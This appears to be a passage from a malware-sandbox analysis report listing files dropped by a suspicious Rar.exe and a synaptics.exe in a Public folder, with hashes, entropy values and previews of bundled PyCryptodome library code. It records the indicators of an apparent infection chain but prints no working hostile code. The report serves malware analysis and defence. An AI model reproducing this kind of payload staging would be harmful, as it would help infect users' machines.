                                                                                                                                                                                      Preview:#..# SelfTest/Util/test_strxor.py: Self-test for XORing..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3311
                                                                                                                                                                                      Entropy (8bit):5.046154186405365
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:newfFQHvov0c11HR8GqgxpSKgdkyKv2JeIPHkOS:newdQHv+V00+dkyKv24IcOS
                                                                                                                                                                                      MD5:6006235799D8B51FA0D57D451012FBF9
                                                                                                                                                                                      SHA1:5FF6022873D06D926211402F22235339F228ED24
                                                                                                                                                                                      SHA-256:A5195DE8F0FD1855C9FE4170915BC36C9C9F85DF5B8E14FEAF817C570F9C25F1
                                                                                                                                                                                      SHA-512:66EB48B147A76F1531746E13E699610C26CB8094833005223ACF0B7A74E548388AE94349A642EF2A40132076A1D8C8A74EE85997AD3BE8290B758A76A9E3FE06
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/__init__.py: Self-test for PyCrypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWAR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1612
                                                                                                                                                                                      Entropy (8bit):5.252093420200057
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:SKKXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FGROi5hC3b7f5VNLjg/:SeIB0jcQHMsvI/S3oCFGROi+7nfc
                                                                                                                                                                                      MD5:80548AD81CAB82847277B36A7FB78711
                                                                                                                                                                                      SHA1:DF518CE7B812750B118835598A3E6278934D7F42
                                                                                                                                                                                      SHA-256:165A0BA1E31BEC7C6E80633F113D3882CC2AC98E37F51E9224AAAE8B3DF93D67
                                                                                                                                                                                      SHA-512:0357B12B490096A0564944310129D5EEBFAADDF5CDB3EB8465D36422AAB4AB606937FD1BB927C49904D7A43E12B9139D486D438D36B59FE06BF1145744AAA09A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python..#..# __main__.py : Stand-along loader for PyCryptodome test suite..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8290
                                                                                                                                                                                      Entropy (8bit):4.711704617154598
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:fqrskrs9t3q/IPgznMH/wpZJ3wGp6gM9KlnR10n3kp:yrskrs9VqwgD3pZJ3np6gMaj0nc
                                                                                                                                                                                      MD5:1CEA7121AA769ADD798184C715B0A87B
                                                                                                                                                                                      SHA1:38A493251DCCFD8FA4324DA3BC7512D2EF0A6CB4
                                                                                                                                                                                      SHA-256:1D9542404A9119043588ADDF20B0A69AF6023CFD5072610207A93509A4E7E0EB
                                                                                                                                                                                      SHA-512:29086E883A414DDA4642EA3EE6119CEA6F1EACAD114AFCEDCACB65071DEFF5034CD5AD22EB88E26F9A17045C20BCBEE26AA59883D6C33D916CCA129895B4BAD7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2000
                                                                                                                                                                                      Entropy (8bit):5.225498157362526
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NrwEIB0jcQHMsvI/S3oCFgJ1+Ql+G8Aqbn0Quqoc9Df1UQ:JwfFQHvoj1HlOn0dqRDf1UQ
                                                                                                                                                                                      MD5:B1A5A642E0F13E51AEE1AA096B819498
                                                                                                                                                                                      SHA1:499EAA63461629F2883FBD1B40FFA32025CB64B4
                                                                                                                                                                                      SHA-256:AA5EB6DDEE38BF49097C0AF6262C8B90CA0CD366AC0826DD8AAE37B63CD8B045
                                                                                                                                                                                      SHA-512:452A98DABBD55A1EB3648CF02BA49430887609467920511907788505F9D5505C7F11EEBFF850D26722EC3F9E92B7BD14D37EA15505D09C68AD10825770D969C4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# SelfTest/st_common.py: Common functions for SelfTest modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15703
                                                                                                                                                                                      Entropy (8bit):4.885505436795799
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:frskrs9VqeLElh6OXUqNF/eqHb2G6kP09W7:fr6qLjFvTh
                                                                                                                                                                                      MD5:D6E0624C129C7C3BC3CFF8A17611430E
                                                                                                                                                                                      SHA1:30D96A4902E6D5F54667EE9E94C2BD4D3F2DD022
                                                                                                                                                                                      SHA-256:EBED89F64095A8B493E850D5F976AD3E30991211C5EE53F47242B18DBC762490
                                                                                                                                                                                      SHA-512:4BC303F11DB4301738C8A9E0E983C5C13AAC63F3B6E9CC597E1C2999B8EEE241E9CEE5C2B9DAA5D7DDAA6EFB468E58E7DA52110962B49A5C9D55DA53F6382B01
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# Signature/DSS.py : DSS.py..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1121
                                                                                                                                                                                      Entropy (8bit):4.992804063334473
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RE2C19+14f+161z4NoQoAUx9Bw+LtvUO38AdILhG8A+N8APto5BfTE5PadOI:hy+1w+1KcJoNRL9UfEIL/LWStrYdB
                                                                                                                                                                                      MD5:38E9FC3517817B876019A478AB882734
                                                                                                                                                                                      SHA1:34493501A5A5AE3C744CBAC46BAEA8C2F276B08B
                                                                                                                                                                                      SHA-256:BB3A920B06532D4AA7363F205556243F2B71014E1FA0851DE64840CD26C9AD50
                                                                                                                                                                                      SHA-512:6E003672E1F2B603325A57C66F59C0C1487243D5FC738A809FF04960C5A675AE3E68DCF0BB101CC00944DFB80FFBAF1869DA02CB8D46AD92841E9A9330689F6F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Optional, Callable..from typing_extensions import Protocol....from Crypto.PublicKey.DSA import DsaKey..from Crypto.PublicKey.ECC import EccKey....class Hash(Protocol):.. def digest(self) -> bytes: .......__all__ = ['new']....class DssSigScheme:.. def __init__(self, key: Union[DsaKey, EccKey], encoding: str, order: int) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .......class DeterministicDsaSigScheme(DssSigScheme):.. def __init__(self, key, encoding, order, private_key) -> None: .......class FipsDsaSigScheme(DssSigScheme):.. def __init__(self, key: DsaKey, encoding: str, order: int, randfunc: Callable) -> None: .......class FipsEcDsaSigScheme(DssSigScheme):.. def __init__(self, key: EccKey, encoding: str, order: int, randfunc: Callable) -> None: .......def new(key: Union[DsaKey, EccKey], mode: str, encoding: Optional[str]='bin
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2154
                                                                                                                                                                                      Entropy (8bit):5.295272514709387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHs0+mETupY34KepRG1:MwDqrYJALrYJHdt3EHGuI9DjYA3G1
                                                                                                                                                                                      MD5:C9AD0C720C157C21F0BDE59A9C570978
                                                                                                                                                                                      SHA1:08AD968BE36D338E46DBB26BF8F74508451FA359
                                                                                                                                                                                      SHA-256:B54B24BE5330B4EB23A8D0BEF242BD785DFB0F1B31DCBACEB87AF47B73DB5A32
                                                                                                                                                                                      SHA-512:79292C6608760748C9030C0C7DEEA4F600A7480AEE20290F5F9E9C55A0162F9C3A014CCD4090694DBAD8322C7FB000813D97DDC9DD7F7E88EBEBBDEDA189AF14
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):895
                                                                                                                                                                                      Entropy (8bit):5.021175970297132
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RE2C19+1bsY4Nf3fkKov27aBAOzev9Bw+LtZ3XEDf:Jy+1o3xf1ov2GovRLP3s
                                                                                                                                                                                      MD5:B10C8861416461026424D8341D6B711B
                                                                                                                                                                                      SHA1:9207CD03C8A4F03ADE3FB52D7DD1828E8B734090
                                                                                                                                                                                      SHA-256:2B2FB1983B8866D1CA635CDA145BF4639196A83A0F9B8AA7A6D0F0D39913F8F0
                                                                                                                                                                                      SHA-512:F99F6E29E7980B548D07A760C116964872909158395D158C9199F5E458952AC37EA2D1645E186ED5EB17B570061F60D2A7A903218C9FADE89D61A5FF4562134C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Union, Callable, Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey......class Hash(Protocol):.. def digest(self) -> bytes: ..... def update(self, bytes) -> None: .........class HashModule(Protocol):.. @staticmethod.. def new(data: Optional[bytes]) -> Hash: .........MaskFunction = Callable[[bytes, int, Union[Hash, HashModule]], bytes]..RndFunction = Callable[[int], bytes]....class PSS_SigScheme:.. def __init__(self, key: RsaKey, mgfunc: MaskFunction, saltLen: int, randfunc: RndFunction) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: ...........def new(rsa_key: RsaKey, mgfunc: Optional[MaskFunction]=None, saltLen: Optional[int]=None, randfunc: Optional[RndFunction]=None) -> PSS_SigScheme: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2042
                                                                                                                                                                                      Entropy (8bit):5.32432696462352
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIH20+8bETupt3Tk2dRGM:MwDqrYJALrYJHdt3EHGuIjRjtPGM
                                                                                                                                                                                      MD5:7D8BF8D0C4889A5BF6BB4EB95AA44466
                                                                                                                                                                                      SHA1:06633D6A4637773198A481EAB9ED156591DB7932
                                                                                                                                                                                      SHA-256:0653BE50072749B16247CBB4905BB79FBD877FFC93F51C5B3E59EDC5FEB48E07
                                                                                                                                                                                      SHA-512:68B95CBC4A39638FB7462DC391A145EC115BA045F301FEC54A475D134E5A3C93ED3223DD06C8895D2916294FB09A2A54B6D666307053F1AFC443AAF879267806
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):467
                                                                                                                                                                                      Entropy (8bit):4.916093935652459
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBkRE1Bvxp+1bgBx1z4L556W3x1AggPIbY9Bw5ZwWOLtw3A0PIbR3:1REFC19+1bs1z4NNrAPAbY9Bw+Ltw3X2
                                                                                                                                                                                      MD5:CA5E82193E428D853927F573B9D0AFFD
                                                                                                                                                                                      SHA1:D1A94E957421405394C4EA31C15A384E3B758978
                                                                                                                                                                                      SHA-256:FCA639E57C49A12AE306A309B29E2D2F49730F65AA23C5FF7DBC031A9EE8D378
                                                                                                                                                                                      SHA-512:EEEDB242B966E71847B03C7CBBC519E77BBCB1DCCD2BE1CEE0BBF2A29B9833F22ACCAD774B7F782D4BF3D3F3EDC7B959117252D2C6C21ABFB1678166BE80AF84
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Optional..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class Hash(Protocol):.. def digest(self) -> bytes: .......class PKCS115_SigScheme:.. def __init__(self, rsa_key: RsaKey) -> None: ..... def can_sign(self) -> bool: ..... def sign(self, msg_hash: Hash) -> bytes: ..... def verify(self, msg_hash: Hash, signature: bytes) -> bool: .........def new(rsa_key: RsaKey) -> PKCS115_SigScheme: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                                      Entropy (8bit):5.278283491953278
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MwWOqrYJALrYJHdG43tDs3EsIG13NcuIHQ+t1v:MwDqrYJALrYJHdt3EHGuIT
                                                                                                                                                                                      MD5:60FAD4E2C2EF2BA9BC88934491AB89F8
                                                                                                                                                                                      SHA1:45D630681807B431E6A26BF1438B4A477F07BE74
                                                                                                                                                                                      SHA-256:2567D9DADE66C8CE9981C1B3856398708FFF5037E6ABBF4C0A9D60AFBD1E8678
                                                                                                                                                                                      SHA-512:DDF73D98249043EB96E57121447EAEABB54E31DD35ACEC319FA7195B9DBC03D1B914E4014A023CB5ADC01F5DCB9C981ADF4F962EFAF011B723EC1F6C47CE5D10
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):352
                                                                                                                                                                                      Entropy (8bit):5.3437569578586555
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/grG01/WlJnIsICA51dJyikQSKCUICAfeT37ZgAk+g8uaHxEM9ArMgA5762:CgrG09WllIVF1mikQ4NSDQ+g8VlhD762
                                                                                                                                                                                      MD5:2D5E2D2B48FE9EB87DF6FE46A4E68C58
                                                                                                                                                                                      SHA1:30E97612405568263B86BD0ACC67DAB72E72BF2D
                                                                                                                                                                                      SHA-256:3BE20F38526BB469263A59EE82DEF3D3351CEDD0D58425BBEB9E1559A3826CCF
                                                                                                                                                                                      SHA-512:00C2CC73F6EF8639140EDE48FC4EE39D12388EEA4CBB0ACF920B3322562D601B70C9578F87AA43CCD34CB2052242119CF15575E25132A80893F448863FBB6650
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.g.d...Z.d.S.).zeDigital signature protocols..A collection of standardized protocols to carry out digital signatures..).Z.PKCS1_v1_5Z.PKCS1_PSSZ.DSSZ.pkcs1_15Z.pssZ.eddsaN)...__doc__..__all__..r....r.....KC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Signature\__init__.py..<module>....s........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10800
                                                                                                                                                                                      Entropy (8bit):5.325984156587778
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:G1XsDu4taLRgOBEsNXAYcURRFNlm32KFO6GaVRlpBlYa:G18CI+RgslADURRV/KPGaVZBea
                                                                                                                                                                                      MD5:F81D8D4FFACCF9EF1FA51E6CF5719783
                                                                                                                                                                                      SHA1:98B3AACD50DDFD7288A2E87DB652525A1B2F6356
                                                                                                                                                                                      SHA-256:5313A44318D3BE517B6F66C639A8A4A3CBB7B77EF9EB1D0F4998DB926D693B52
                                                                                                                                                                                      SHA-512:EA56E60AE1A602F20EFDC3278F622D3C4E93D2FADE7F12E90B406D9C361FC452573B4574AA870EDBE6893FEAEC1538EA23FD942D2FC6B4B2CB813947A46FD179
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.6.......................@...sz...d.d.l.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...bchr..bord..iter_rangeN)...ceil_div..long_to_bytes..bytes_to_long)...strxor)...Randomc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PSS_SigSchemezvA signature object for ``RSASSA-PSS``.. Do not instantiate directly.. Use :func:`Crypto.Signature.pss.new`.. c....................C...s....|.|._.|.|._.|.|._.|.|._.d.S.).at...Initialize this PKCS#1 PSS signature scheme object... :Parameters:. key : an RSA key object. If a private half is given, both signature and. verification are possible.. If a public half is given, only verification is possible.. mgfunc : callable. A mask generation function that accepts two parameters:. a string to use as seed, and the lenth of the mask to. genera
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12758
                                                                                                                                                                                      Entropy (8bit):4.953249726457768
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:6qrskrs9t3q/IVQVluiDVluYQu1s1NuMMMt:Frskrs9VqMlB1L
                                                                                                                                                                                      MD5:0A4AF23CD5DF55B2C6E57D27689FCD5C
                                                                                                                                                                                      SHA1:EAC0752A6E323C8A7EEB4D740268364526422DB5
                                                                                                                                                                                      SHA-256:2DC65C619AFC2F1F5D170FA8FC67998B78FEB6ECC9EA4A3375AFE3C10AB37348
                                                                                                                                                                                      SHA-512:E540382C6CCBACA754AED2B9F9A0D90938A37A00ED27B3829AD69B6089EC267767BEEB10968FD30BA7CBA586E20EB2DA6FE5D5ABC69AFA77AFE935C5D2D3482B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):747
                                                                                                                                                                                      Entropy (8bit):4.991320777959256
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYBlRE1BvxS+1dw1z4L556trLuh72tR5A8TTo448/u4Jw1AL1A19YRG98mfvIs:1REOC1++161z4Nfh7IGhI+1mAl9Zfjuk
                                                                                                                                                                                      MD5:F75719D633E9543F8B2191818F5F949E
                                                                                                                                                                                      SHA1:50C2F1E8A90E757A473DDD36FA897EBA33B52786
                                                                                                                                                                                      SHA-256:AB1B0BBE6DF0B563E17CF22EB3DCE37DAC436C836F19A3498647B6A167BC2C45
